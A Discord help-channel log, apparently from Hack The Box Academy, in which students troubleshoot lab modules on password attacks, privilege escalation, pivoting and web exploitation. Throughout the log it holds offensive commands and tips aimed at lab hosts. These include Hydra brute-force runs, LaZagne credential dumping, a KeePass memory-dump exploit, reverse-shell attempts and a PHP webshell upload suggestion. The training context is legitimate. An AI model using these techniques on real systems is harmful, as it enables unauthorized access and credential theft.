#modules

1 messages · Page 127 of 1

worn nova
#

have you solved?

orchid pine
#

the normal password list and the mutated one

#

[STATUS] 411.00 tries/min, 411 tries in 00:01h, 9780200 to do in 396:37h, 29 active

#

looooooooooooool

#

$ hydra -L username.list -P mut_password.list -t 64 ftp://10.129.13.48
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-09-13 15:48:13
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 64 tasks per 1 server, overall 64 tasks, 9780576 login tries (l:104/p:94044), ~152822 tries per task
[DATA] attacking ftp://10.129.13.48:21/
[STATUS] 411.00 tries/min, 411 tries in 00:01h, 9780200 to do in 396:37h, 29 active
[STATUS] 457.67 tries/min, 1373 tries in 00:03h, 9779238 to do in 356:08h, 29 active

GitHub

hydra. Contribute to vanhauser-thc/thc-hydra development by creating an account on GitHub.

ashen umbra
#

this gets it there but it is encoded and doesnt execute on the victim server

tranquil axle
#

Just to make sure, you aren’t trying to run a .exe on a linux system are you?

ashen umbra
#

Maaaaybe

#

yes lol

#

tried to make it into a .py

tranquil axle
#

Yea exe is for windows, lazagne should have a python version too I think?

ashen umbra
#

yes I gotta find it

#

my brain is fried. this is what i get when i do python3 laZagne.py all on the host

Traceback (most recent call last):
File "laZagne.py", line 17, in <module>
from lazagne.config.write_output import write_in_file, StandardOutput
ModuleNotFoundError: No module named 'lazagne'

ashen umbra
#

yeah im stuck on this machine

orchid pine
#

Password Attacks Lab - Easy
Our client Inlanefreight contracted us to assess individual hosts in their network, focusing on access control. The company recently implemented security controls related to authorization that they would like us to test. There are three hosts in scope for this assessment. The first host is used for administering and managing other servers within their environment.

#

anyone worked on this

#

i need some help

rustic sage
#

you need to allow server members to message you

orchid pine
#

oki

#

give me a seconds

scarlet iris
#

Hi everyone could anyone give me exaples of their notes for modules and boxes in Academy. I'm strugling with making one that will be usefull for future
Thanks for help 🙂

orchid pine
rustic sage
orchid pine
#

i tried to sent you a message

#

and the same rror

rustic sage
#

let me turn it on real quick

rustic sage
rustic sage
orchid pine
#

done

orchid pine
#

lool

#

again

#

send me a freind request

ashen umbra
#

well now I am stuck on the Passwd, Shadow & Opasswd module. cant cat anything without root and I dont see any hints on how to get the shadow file

fathom pendant
#

There is a directory that the user has that has the files

ashen umbra
#

ah

#

I way overthought tha

dense badge
#

Im doing the easy password cracking lab right now, I'm running hydra against the ftp server with just the username and the password list given in the resources, and the password file is not mutated, hydra is saying it is going to take an hour, I have -f set so it could take less, but is that normal?

oak sequoia
#

Hi, this explanation from XSS I dont understand why the first is suspicious and the second one isnt

echo roost
short hare
dense badge
orchid pine
#

And its took me 2h

dense badge
orchid pine
#

only 50 min for you you so lucky 😂😂

dense badge
#

i guess so kek

orchid pine
pearl hemlock
#

anyone

lusty thicket
silk mantle
#

hello everyone one i am new here

#

and also new to hacking, i have been researching a bit but its too much info and idk where to start, i have a little bit of prior programming expierence in javascrpt but i am very amature i was hoping you can guide me

dense badge
silk mantle
#

ohh ok

acoustic owl
fringe shell
# silk mantle ohh ok

just start by doing my guy. HTB as academy and their older machines with walkthroughs and youtube videos. Highly recommend you start with something like https://obsidian.md so you can jot down notes and lessons as you go as well.

Obsidian is the private and flexible note‑taking app that adapts to the way you think.

orchid pine
#

┌──(shadowalker㉿kali)-[~/Downloads]
└─$ hydra -L username.list -P password.list -t 64 smb://10.129.202.221
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-09-14 00:05:36
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 1 task per 1 server, overall 1 task, 21112 login tries (l:104/p:203), ~21112 tries per task
[DATA] attacking smb://10.129.202.221:445/
[ERROR] target smb://10.129.202.221:445/ does not support SMBv1

GitHub

hydra. Contribute to vanhauser-thc/thc-hydra development by creating an account on GitHub.

#

guys can i change the version of smb on hydra

#

cuz i know that the service is runing an smbv2

orchid pine
coarse void
orchid pine
#

thx broo ur the best

coarse void
orchid pine
#

Hydra does not natively support SMBv2 or SMBv3 for brute-forcing. The smb module in Hydra typically attempts to use SMBv1,

#

XD iil use crackmapexec

orchid pine
#

guys any idea

#

how can i decrypte this file file Documentation.docx
Documentation.docx: CDFV2 Encrypted

#

just hints no spoil

#

never mind i can jhon to get the password to dycrypte it

dreamy solar
#

Can I help me please? Private?

vital adder
dreamy solar
#

okay thanks you excuse le

#

I make a post in the community help ^^

vital adder
dreamy solar
#

I don't have access in aucun accès

acoustic owl
azure trench
#

Hi need a small help "Unconstrained Delegation - Computers"

#

Facing issue on this

royal sigil
#

hello i make the Nginx Reverse Proxy & AJP
i have comment the ngnix.conf but i have this ( invalid port in upstream)

tender schooner
#

is it just me or is the academy site down? 500 Server is not feeling well

rapid sparrow
#

yes

#

it down...

tender schooner
#

aaand its back

tough prawn
#

It's working

#

Now it's Down

royal sigil
#

yeah down

#

same

tender schooner
#

also is this a good area to ask about why i cant do from "pwn import xor" on the downloaded parrot htb distro? it says ModuleNotFoundError: No module named 'elftools.common.py3compat'

candid lily
#

is htbacademy down?

acoustic owl
#

Apple does the same. When they launch new products, the store is taken offline....

candid lily
#

it gives 502 error

royal sigil
#

maybe add module

dull zinc
# candid lily is htbacademy down?

i get "bad gateway".. not sure what's so bad about it, it seems to be working fine.. the host behind the gateway, now that's a different story

acoustic owl
tough prawn
#

Guys Try HEAD Method Lol

rapid sparrow
rapid sparrow
#

or maybe someone pwned and got the flag...

royal sigil
tender schooner
#

is the point of the academy.hackthebox to hack it and get the flag? and here we were just doing the cources

acoustic owl
royal sigil
#

ah ok

zealous fiber
zealous fiber
sly dome
#

ok?

trail depot
#

AcademyTwo

zealous fiber
sly dome
#

tldr

tender schooner
#

i luckly still have the page up for what section im working on but cant do anything cause it says to Create the XOR ciphertext of the password 'opens3same' using the key 'academy'. (Answer format: \x00\x00\x00....) the parrot htb distro says it doesnt have 'elftools.common.py3compat'

zealous fiber
candid lily
#

what module are you doing

dull zinc
tender schooner
#

Cracking Passwords with Hashcat Hashing vs. Encryption, there are other ways

tender schooner
# zealous fiber pip install pyelftools

Defaulting to user installation because normal site-packages is not writeable
Requirement already satisfied: pyelftools in ./.local/lib/python3.9/site-packages (0.30)
DEPRECATION: gpg 1.14.0-unknown has a non-standard version number. pip 23.3 will enforce this behaviour change. A possible replacement is to upgrade to a newer version of gpg or contact the author to suggest that they release a version with a conforming version number. Discussion can be found at https://github.com/pypa/pip/issues/12063
DEPRECATION: wfuzz 3.1.0 has a non-standard dependency specifier pyparsing>=2.4*. pip 23.3 will enforce this behaviour change. A possible replacement is to upgrade to a newer version of wfuzz or contact the author to suggest that they release a version with a conforming dependency specifiers. Discussion can be found at https://github.com/pypa/pip/issues/12063

sly dome
tough prawn
#

cool Fixed now

sly dome
zealous fiber
candid lily
#

its back

royal sigil
#

hello i make the Nginx Reverse Proxy & AJP
i have comment the ngnix.conf but i have this ( invalid port in upstream)

tender schooner
#

want me to paste the entire output?

zealous fiber
candid lily
#

yea woop

zealous fiber
tender schooner
#

$python3.9
Python 3.9.2 (default, Feb 28 2021, 17:03:44)
[GCC 10.2.1 20210110] on linux
Type "help", "copyright", "credits" or "license" for more information.

from pwn import xor
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "/home/galareed/.local/lib/python3.9/site-packages/pwn/init.py", line 4, in <module>
from pwn.toplevel import *
File "/home/galareed/.local/lib/python3.9/site-packages/pwn/toplevel.py", line 23, in <module>
from pwnlib import *
File "/home/galareed/.local/lib/python3.9/site-packages/pwnlib/dynelf.py", line 57, in <module>
from pwnlib import elf
File "/home/galareed/.local/lib/python3.9/site-packages/pwnlib/elf/init.py", line 9, in <module>
from pwnlib.elf.corefile import Core
File "/home/galareed/.local/lib/python3.9/site-packages/pwnlib/elf/corefile.py", line 79, in <module>
from elftools.common.py3compat import bytes2str
ModuleNotFoundError: No module named 'elftools.common.py3compat'

sly dome
#

dont use pwntools?

candid lily
#

maybe pip install elftools

sly dome
#

there are infinite ways to make a XOR cipher

zealous fiber
#

pip3.9 install --force-reinstall pyelftools
pip3.9 install --force-reinstall pwntools

tender schooner
#

was following the module and got stuck there.

zealous fiber
#

If its still not workiong after that I would suggest using the Methods that RafaJurado metioned 👍

zealous fiber
final hedge
#

Down, down, down...

sly dome
placid heron
#

not for me

tender schooner
#

yeah... its just erroring saying i dont have the updated dependencies, but when i try installing the dependencies they say that they are fully updated... catch 22. ima just use that website

deft moat
dreamy geyser
#

yeah im getting 502

rustic sage
#

same for me

rapid sparrow
lunar urchin
#

same for me

deft moat
#

Haha I refreshed several times

kindred loom
#

same for me 502 now

dreamy geyser
#

its up now ig

#

pretty slow tho

deft moat
#

How do I contact support?

#

They will need to remove my IP from block list

dreamy geyser
#

they didnt ban u dw, it was down for everyone for a min

trail depot
#

the block is probably temporary

deft moat
#

Yeh but I don't want to wait

#

I refershed several times in a row

kindred loom
#

still 504 here

dapper violet
#

If the work takes a long time, will we get extra time to take the exam?
because i have ~30h to complete CBBH and Report

merry flame
kindred loom
#

now up but slow

final hedge
#

Up!

placid heron
#

it's going up and down

dire birch
#

someone actually have beed doing their modules

tidal gyro
#

down nowFeelsBadMan

tender schooner
#

so who is hacking the box anyway? also i found a website to do it, i hope i wont need elftools

deft moat
#

Finally my IP got removed from backlist

merry flame
#

Its actually up now

placid heron
#

import should work after

#

i think...

tender schooner
worn nova
#

no one has the ideas to solve it? 🤨

lusty thicket
#

where are you having problems?

worn nova
tight mesa
#

hello y'all, is this error meaning the xp_cmdshell is not enabled in the MSSQL Srv :
The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'...???

lusty thicket
worn nova
hollow oak
#

Hello.

sly kelp
#

So I am not the only one facing issues

#

Good to know that

hollow oak
sly kelp
#

That is harder than CPTS

hollow oak
sly kelp
tender schooner
#

anyone know how to solve this error with hashcat? clBuildProgram(): CL_BUILD_PROGRAM_FAILURE

error: unknown target CPU 'generic'

  • Device #1: Kernel /usr/share/hashcat/OpenCL/shared.cl build failed.
    ps
    Device #1: pthread-AMD Ryzen 9 5950X 16-Core Processor
hollow oak
sly kelp
hollow oak
sly kelp
hollow oak
sly kelp
sly kelp
hollow oak
#

||Afghanistan ||

sly kelp
#

Daaamn

#

Hopefully

#

Things will get better for you

hollow oak
sly kelp
hollow oak
fathom pendant
#

This isn't a general channel. Please verify your account following #welcome to be able to access more channels

fathom pendant
sly kelp
hollow oak
echo roost
fathom pendant
fathom pendant
echo roost
#

what? hmmm

#

even with HTB{ it doesn't work

#

I blurred out the rest. Is that what you mean?

fathom pendant
#

No

#

It looks like it's cut off

echo roost
#

strange

fathom pendant
#

You probably changed the window size following the section

echo roost
#

I ran this bash loop to get it ||while read line; do echo $line; done < /opt/flag.txt; echo $line||

#

restricted shell - susge

fathom pendant
#

like i said it looks cut off ¯_(ツ)_/¯

#

Doesn't it look odd to you?

echo roost
#

yes missing HTB

#

and a typo

#

hmm, i'll keep working the issue

fathom pendant
#

are you sure it's even meant to be in brackets? ¯_(ツ)_/¯

royal sigil
#

hello i make the Nginx Reverse Proxy & AJP
i have comment the ngnix.conf but i have this

lusty thicket
sly kelp
#

Logrotate section in Linux priv escalation

How many minutes I have to wait until I get connection on my machine. Like am waiting for 5 minutes no response

tender schooner
#

anyone know how to solve this error with hashcat?
clBuildProgram(): CL_BUILD_PROGRAM_FAILURE

error: unknown target CPU 'generic'

Device #1: Kernel /usr/share/hashcat/OpenCL/shared.cl build failed.
ps
Device #1: pthread-AMD Ryzen 9 5950X 16-Core Processor

echo roost
#

that's the first thing I tried

echo roost
hardy breach
#

Hello am new here

orchid pine
#

hello guys

#

im on the hard lab

#

password attacks

#

i found a keepass on the machine version 2.50

#

which is KeePass 2.X Master Password Dumper (CVE-2023-32784)

#

i tried to run the xploit and im getting this error

#

┌──(shadowalker㉿kali)-[~/hardlab/keepass-password-dumper]
└─$ dotnet run ~/hardlab/KeePass.DMP

Welcome to .NET 6.0!

SDK Version: 6.0.400


Installed an ASP.NET Core HTTPS development certificate.
To trust the certificate run 'dotnet dev-certs https --trust' (Windows and macOS only).
Learn about HTTPS: https://aka.ms/dotnet-https

Write your first app: https://aka.ms/dotnet-hello-world
Find out what's new: https://aka.ms/dotnet-whats-new
Explore documentation: https://aka.ms/dotnet-docs
Report issues and find source on GitHub: https://github.com/dotnet/core
Use 'dotnet --help' to see available commands or visit: https://aka.ms/dotnet-cli

/usr/share/dotnet/sdk/6.0.400/Sdks/Microsoft.NET.Sdk/targets/Microsoft.NET.TargetFrameworkInference.targets(144,5): error NETSDK1045: The current .NET SDK does not support targeting .NET 7.0. Either target .NET 6.0 or lower, or use a version of the .NET SDK that supports .NET 7.0. [/home/shadowalker/hardlab/keepass-password-dumper/keepass_password_dumper.csproj]

The build failed. Fix the build errors and run again.

acoustic owl
pastel lance
#

anyone else having trouble connecting to academy network? I've switched and reloaded my vpn multiple times and cannot connect

heavy ginkgo
#

Currently trying to bruteforce ftp/ssh in the password mutation section for password cracking module. Ive made a list of around 8k based on other tips ive found online but it still seems to not be working

#

nvr mind

#

i got it

main meadow
#

Hi guy, i have a question regarding AD Skill Asssessment II. I already completed it but just confused as to why the ms01 machine can get more ntmlv2 user hashes than the kali attack machine via LLMNR posioning even though both are on the same subnet.

river juniper
#

hi @everyone

paper gust
#

I'm guessing POCL based on the error

tender schooner
#

OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project] yes, ive been trying to switch to amd rocm but either im messing it up or it doesnt help me

paper gust
#

yeah that's pocl

#

so the actual "issue" is that pocl doesn't support your CPU

#

at least, not specifically, hence the "generic" target

#

AMD ROCm will Also probably not work here

#

since it's a GPU specific runtime

#

you will need to replace pocl with Intel's CPU runtime (counter intuitive, i know, but AMD doesn't have their own)

tender schooner
#

yeah i saw that online, but i dont know which one, the intel-opencl-icd?

orchid pine
#

Ig ill try the john like you said

paper gust
# tender schooner yeah i saw that online, but i dont know which one, the intel-opencl-icd?
installation package. Check the release notes to ensure supported targets include your target device. 
Linux* OS 

Please take one of the following methods to install the Intel CPU Runtime for OpenCL™ Applications. 

    Download Intel® oneAPI Base Toolkit to install the latest OpenCL™ CPU runtime.
    Visit  Intel® CPU Runtime for OpenCL™ Applications with SYCL support to download and install the latest OpenCL™ CPU runtime for Linux*. 
    Github: https://github.com/intel/llvm/releases
        Search for "oneAPI DPC++ Compiler dependencies" and find latest release to download, e.g. https://github.com/intel/llvm/releases/tag/2020-WW20
        Follow the installation instructions to install.

tender schooner
#

so after i get that, how would i switch to it? i don't see too much info on it.

paper rivet
#

Hello, I'm in password attacks --> password mutations. I have mutated the wordlist with the ||custom.rule|| and I grepped by ||b's|| but i don't get anything. Any hint please?

#

I'm brute forcing ftp, that is faster to brute than ssh i suppose

orchid pine
#

tender schooner
paper gust
#

can you uninstall pocl?

#

you may need to install the icd loader

tender schooner
#

I did yes, and now it says there is none.

paper gust
#

yeah, you'll probably want to install the icd package

#

the one you had identified before

tender schooner
# paper gust the one you had identified before

intel-opencl-icd is already the newest version (22.39.24347).

clGetPlatformIDs(): CL_PLATFORM_NOT_FOUND_KHR

ATTENTION! No OpenCL-compatible or CUDA-compatible platform found.

You are probably missing the OpenCL or CUDA runtime installation.

paper gust
#

Yeah, this is the problem with these runtimes lol

#

registration can be a huge pain in the ass

tender schooner
#

trying to figure out how to make it see it >.>

unreal dragon
#

whats up guys, new here. i need some help

#

i was trying to change my email to my student email and i accidentally typed it in wrong. so now it wants me to log into a non existant email and verify it...

#

anyway i can change the email without having to verify it?

proud pine
scarlet iris
#

Hello, I have the question is there any order I should do modules in Penetration Tester Path ? I did Attacking common Services and now it directs me to PIVOTING, TUNNELING, AND PORT FORWARDING ?

proud pine
unreal dragon
novel matrix
umbral fulcrum
#

hey Guys I'm in "Password Attacks Lab - Hard"
I can't get the mount file ...
I try this website : https://itsfoss.com/mount-encrypted-windows-partition-linux/

but when I do it it gives me :
"Thu Sep 14 20:00:58 2023 [CRITICAL] Cannot parse volume header. Abort."

any1 can help me please it driving me crazy

atomic briar
#

This one

#

I just finished Attacking Common Services - Medium but if I'm honest, it was only the fact that I read in here that ||my nmap wasn't broad enough || that gave me the necessary info. So I thought I'd ask those who managed to figure it out by themselves, are you ||scanning all ports each time you do an nmap rather than just top 1000|| or was there something in the standard nmap that gave you the clue?

final maple
orchid pine
#

any help guys

thorn urchin
#

find a diff way to auth

orchid pine
#

this goupmemebre ship can help me to add david to the rdp users

orchid pine
#

never mind

#

guys anyone now how can i mount thsi file Backup.vhd i was trying to do so but i was getting errors after errors

vital adder
umbral fulcrum
orchid pine
#

cuz i dont have anu info about how bit locker work or how do i know that the file is protected with bit locker

nova wharf
#

hey guys I'm in the Docs and reporting module and I'm trying to understand why my answer is wrong. Am I inputting the answer wrong?

fringe shell
nova wharf
#

no dice

fringe shell
nova wharf
#

are they going off of the ippsec settings because the first sheet has that as how to do vertical splits

nova wharf
nova wharf
orchid pine
#

treid to mount it

#

it wont

nova wharf
#

do you have it enabled?

orchid pine
#

how can i know that is enctypted with bitlocker

vital adder
vital adder
orchid pine
#

its oki

vital adder
orchid pine
#

no i didnt

#

i got the file

#

tried to mount it

#

too many errors

#

how can i know its protected witha password and its uding for encryption bitlocker

vital adder
orchid pine
#

to avoid spoil

#

can i dm you

vital adder
#

sure

fathom pendant
#

Unless you're referring to encrypting your own drive

fringe shell
nova wharf
nova wharf
nova wharf
nova wharf
fathom pendant
#

I think you still can with cmd line. But the major point was that, by saying that you could have thrown someone way off from how they were going to do the module.

nova wharf
#

Was given half info when i replied to the message. Originally

thorn urchin
#

manage-bde goes brrrrr

fathom pendant
#

Nah I scrolled up, plenty of context was given

nova wharf
fathom pendant
#

I mean I scrolled up from where you replied to the user

#

Before answering questions try gathering context (scrolling up usually).

nova wharf
#

Heard, staying quiet is more my speed so I’ll just leave the question answering to others then.

frank seal
#

This may be completely irrelevant for now but if anyone in future needs: if anyone is using ZAP for fuzzing and needs an ASCII encoder processor, install the community scripts add-on from the zap marketplace, then enable to-hex.js script under the Payload Processor in the scripts pane on the left. You should be able to select scripts in the processor pane and see to-hex.js when fuzzing

feral stump
#

hi I'm on hard lab pwd attacks and have been trying to mount the vhd using qemu-nbd and bitlockermount but is not working. Have been checking the history in the channel and the forums but can't understand what is the problem

#

with dislocker it prompts the Cannot parse volume header. Abort.
and with cryptsetup bitlkOpen it shows not a valid BITLK device even if I had no problems when using the qemu-nbd command and the Backup file

fiery berry
feral stump
fiery berry
deft moon
harsh patrol
rustic sage
#

Hello everyone im doing the module Linux privilege escalation, im in part logrotation, im tring to find the configuration file (/etc/logrotate.conf) but doesnt appear, could somebody give me a hint please?

fiery berry
rustic sage
#

im tring to execute logrotate but my nc is like this

listening on [any] 3333 ...
#

but never gets a connection

fiery berry
fiery berry
# rustic sage but never gets a connection

taking into account that you're making the right steps it could be that the payload isn't triggered, there are better ways to achieve the end-goal rather than getting a reverse shell up to you anyway

rustic sage
#

how can know if the payload is trigget or what i need to do to trigger it?

fiery berry
rustic sage
#

i understend

#

thank u!

fiery berry
#

this is what I would do, probably there are better ways to confirm that is working the way it should

orchid pine
#

hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 4.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]

  • Device #1: cpu-sandybridge-AMD Ryzen 5 5600H with Radeon Graphics, 2819/5702 MB (1024 MB allocatable), 6MCU

Minimum password length supported by kernel: 4
Maximum password length supported by kernel: 256

Counted lines in /home/shadowalker/Downloads/mut_password.listInsufficient memory available
zsh: segmentation fault hashcat -m 22100 /home/shadowalker/Downloads/mut_password.list backup.hash

#

im facing this probleme any help guys

#

i tried to rstart my pc update it but still

narrow solar
#

hey friends, in Attacking Common Applications Attacking Applications Connecting to Services how to solve this

fiery berry
harsh patrol
fiery berry
narrow solar
warm sand
#

hey did you figure this one out? i've found the set values but none of them are accepted. thanks!

umbral fulcrum
#

Hey Do U remeber how U did it ?

#

I'm stuck at that "Pass the Ticket (PtT) from Linux" Q: "Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_). "

and I don't get it

#

If someone have a hint 4 me please ...

obtuse fiber
umbral fulcrum
rustic sage
obtuse fiber
analog dock
#

For me it was a matter of formatting it, still not sure why it didn’t work for me

umbral fulcrum
obtuse fiber
umbral fulcrum
harsh patrol
#

@fiery berry got it now, but it was a different wordlist

umbral fulcrum
tribal rain
#

I am currently working through the attacking enterprise networks module and am on Internal Info gathering, I am finding when transfering nmap to the target and applying correct chmod that it is failing to launch with errors such as unable to find namp service reverting to /etc/hosts, I am also finding that running enum4linux through proxychains is telling me to install smbclient which I have

#

need to work out if I have a bug or missing something

umbral fulcrum
obtuse fiber
#

btw the whole module is tough you just need to be patient and focused

tribal rain
#

nmblookup is not in your path etc, I am working from my kali bare metal via VPN connection to lab, proxychains nmap

umbral fulcrum
#

since I'm root already (got the needed credentials) ...

umbral fulcrum
vital adder
#

also for nmap if you have a pivoting, moving the nmap binary on to the target just to do some scanning is one of the worst thing that you can do

tribal rain
#

I would tend to agree however I was following the instructions in the module

#

I moved the nmap binary and it will run but as soon as I give it --open -iL live_hosts I get the errors above relating to failure to find nmap services

vital adder
tribal rain
#

ahhh ok

#

so do it as I would normally?

vital adder
tribal rain
#

sure thing

thick juniper
vagrant orbit
#

Hi guys, I am currently doing the medium lab for attacking common services and I am unable to bruteforce FTP, every time I try I get this error: target was disabled because of too many errors

#

Does anyone know how to circumvent this?

#

easy*

rotund urchin
#

Can I DM someone about the File Upload Attack Skill Assessment?

rustic sage
rotund urchin
fleet belfry
#

Anyone working on the NTLM relay skills assessment question #3 that can help me understand something about the question?

autumn pilot
#

feel free to dm

weak stirrup
#

I am working on the final question for the hacking word press assessment. I have the an admin password and can get to the admin page. i can not seem to edit the theme. i get an error even if i do not update the 404.php page but hit the update file button. it says: Unable to communicate back with site to check for fatal errors, so the PHP change was reverted. You will need to upload your PHP file change by some other means, such as by using SFTP.... Am i missing some setup that I need to enable to let it communicate back with the site

vital adder
weak stirrup
vital adder
#

give that theme a try

weak stirrup
# vital adder did you use something like the Twenty Seventeen theme?

from what internet says the error would appear to be that wordpress seems to be doing some code check to make sure there are no typos and in that check process it is not getting a proper response back... i am trying to use metasploit (msfconsole and wp_admin_shell_upload) to get a real reverse shell but having issues with that too. the metasploit thing is most likely me ... me and metasploit do NOT seem to like each other much.

vital adder
#

not sure what you found out about that error code but the issue are probably in the theme that you used so try the one i suggested

vital adder
#

yeah, the trick is slow the F down you don't need to jump straight away to a different method first thing after your previous try doesn't work

weak stirrup
weak stirrup
vital adder
# weak stirrup also not sure how to use the cmd through the url properly ... i ended up just ed...

here is some more info on https://www.hackingarticles.in/wordpress-reverse-shell/ and here is the payload that i recommended https://github.com/Arrexel/phpbash

This post is related to WordPress security testing to identify what will be possible procedure to exploit WordPress by compromising admin console. We have already

GitHub

A semi-interactive PHP shell compressed into a single file. - GitHub - Arrexel/phpbash: A semi-interactive PHP shell compressed into a single file.

vital adder
#

the moral of the story is if a theme doesn't work try a different one 🤣

weak stirrup
leaden yew
#

In the "Password Spraying - Making a Target User List" section of Active Directory Enumeration & Attack Module, there is sentence mentioning "flast" format.

Let's try out this method using the jsmith.txt wordlist of 48,705 possible common usernames in the format flast

Anyone know what this is in reference to? I can't seem to find any information on it.

tranquil axle
#

First letter of firstname and full lastname

#

f(irstname)last(name)

leaden yew
hardy breach
#

Where do start from please am a novice here

dapper fable
#

Shells & Payloads - Laudanum question 2: it wants the path given in the section above. Nevermind that its also present under /opt and one of the path components in the answer is a symlink (so it won't show up with find by default)

carmine osprey
#

I am currently on the footprinting module, on the MSSQL section. I cannot run mssqlclient.py, it says it doesnt exist. is there a certain directory i need to be in? or am i approaching this the wrong way? DMs welcome

fiery berry
orchid pine
#

└─$ smbclient -U david \\10.129.7.126\david
Password for [WORKGROUP\david]:
Try "help" to get a list of possible commands.
smb: > get Backup.vhd
parallel_read returned NT_STATUS_IO_TIMEOUT im getting this error since the morning

gloomy bramble
tight mesa
#

hello y'all I'm doing the Pivoting, Tunneling, and Port Forwarding Module | Remote/Reverse Port Forwarding with SSH section, I'm trying to replicate the scenario described in the section but, I'm not sure how to connect with the Windows Machine to download the payload from the Pivot

#

I tried with the Dynamic port forwarding explained previously with no success

#

anyone who has made it and is willing to explain me..!!!

#

or point me to the paragraph/section where is mentioned in the content..!!!!

fiery berry
#

if you want to download something from the "jump host" start a "python simple server" (sure there are other ways to accomplish it) and from the Windows machine in the internal net you have just to download it as per example shown

tight mesa
#

ok., how do you download something from the Windows machine if you don't get access to it?

#

I mean, this command PS C:\Windows\system32> Invoke-WebRequest -Uri "http://172.16.5.129:8123/backupscript.exe" -OutFile "C:\backupscript.exe" need to be run from the windows machine or downloaded from a web browser from the machine as well

#

I'm struggling with the fact I'm not seeing how to connect to Windows machine to download or run the PS command..!!!

fiery berry
#

answer the questions and go ahead there will be the time to do what you want to do so you can replicate the steps. I guess you can even do it if you want right now, but I don't remember honestly

orchid pine
#

help guys

#

i acnnot get the file backuup.vhd
to mu machine its was corrupted thats why i was facing
errors
smbclient -U david \10.129.7.126\david
Password for [WORKGROUP\david]:
Try "help" to get a list of possible commands.
smb: > get Backup.vhd
parallel_read returned NT_STATUS_IO_TIMEOUT im getting this error since the morning

tight mesa
orchid pine
#

its not mu network or something

sturdy stump
#

hi guys

#

i was trying to do one machine of starting point of hackthebox

#

it says
Spawn the target machine and the IP will show here

#

but when in start the pwnbox (which has 2 hour limit)

orchid pine
#

i m trying like 2 days

sturdy stump
#

it still not shows the ip there

orchid pine
#

but the same probleme over and over

sturdy stump
#

i do not understand why is this problem, i used to think hackthebox is best site to do boxes, but this basic problem whyyyyyyyyyyy

#

@sterile hawk

fathom pendant
fathom pendant
short hare
orchid pine
#

same probleme

#

└─$ smbclient //10.129.58.92/david -c 'get Backup.vhd' -U david
Password for [WORKGROUP\david]:
parallel_read returned NT_STATUS_IO_TIMEOUT

ebon coral
#

Have you tried the other file transfer approaches?

#

Maybe the smb route is blocked

echo dock
#

i want to learn to make a cheat for a game

fathom pendant
fiery berry
short hare
short hare
#

PIVOTING, TUNNELING, AND PORT FORWARDING: RDP and SOCKS Tunneling with SocksOverRDP
Question:
Use the concepts taught in this section to pivot to the Windows server at 172.16.6.155 (jason:WellConnected123!). Submit the contents of Flag.txt on Jason's Desktop.

Downloaded the SocksOverRDP-Server.exe, SocksOverRDP-Plugin.dll, ProxifierSetup.exe and transferred to the RDP session.
Turned OFF Defender
Then trying to run 'regsvr32.exe SocksOverRDP-Plugin.dll' as per module and getting this error

What I am doing wrong?

short hare
short hare
fathom pendant
round gale
#

working on the attacking common applications, attacking tomcat section. when i access the url web01.inlanefreight:8888/manager i get asked for the username and password, when i access the web01.inlanefreight:8888/manager/html/ i get a page providing some info. BUT when we try to brute force the login page in metasploit, tomcat_mgr_login module the TARGETURI page is set as /manager/html. why is this set to /manager/html and not /manager/ , i did set it to /manager/ and ran the explout but it didnt run. the exploit runs succesfully only if TARGETURI is /manager/html. any ideas why?

acoustic owl
round gale
acoustic owl
#

Take a close look at the exploit.
What exactly does it attack and how?
Then take a close look at the login process in Burpsuite and try to understand when and where which data is sent and processed.

round gale
#

the module also shows us other exploits which can achieve the same brute force functionality, in those exploits the uri is set as /manager

round gale
split parcel
#

can someone nudge me on Documentation & Reporting Practice Lab?

i got some more users' hash from using a tool.

managed to crack some of it.

but not able to login to the DC01

compact jacinth
#

hi im doing the login brute forcing module atm but im stuck on the skill assessment - website question 2. "Once you access the login page, you are tasked to brute force your way into this page as well. What is the flag hidden inside?" I think im doing everything right and when i google it looks like it but it takes sooo long. Do i need to wait that long? i did
sudo hydra -l user -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -f 178.35.49.134 -s 32901 http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'"

acoustic owl
compact jacinth
#

ehh what do you mean?

#

@acoustic owl

acoustic owl
acoustic owl
compact jacinth
#

sorry im new to this, but i already know the username and everywhere i look it says that i should do bruteforce with rockyou.txt but it says its gonna take hours to complete

#

@acoustic owl

acoustic owl
acoustic owl
acoustic owl
# acoustic owl Think about what hydra does exactly. Then look at your command again and conside...

and one more tip.
Do not try to look for solutions in forums or elsewhere. Look for the solution yourself.
Partly ways, which are described in the forums are not correct. On the other hand, you do not learn the necessary knowledge.
If you are stuck and need help, then ask in the forum or here on Discord explicitly. Then you will certainly get an answer, which leads you in the right direction.

compact jacinth
#

yea I usually dont search up the answers bc i wanna learn but I have been stuck for so long and i cant understand whats wrong with it

#

you mind pointing me in the right direction? @acoustic owl

acoustic owl
#

Look at the source code of the website and find out what the HTML elements are really named and then change your command.

zealous fiber
#

Anyone working on the Game Reversing & Modding Skill Assesment ?

compact jacinth
#

i tried with sudo hydra -l user -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou-10.txt -f 94.237.59.206 -s 58786 http-post-form "/admin_login.php.:username=user&password=^PASS^:F=<form name='login'"

acoustic owl
tulip dragon
compact jacinth
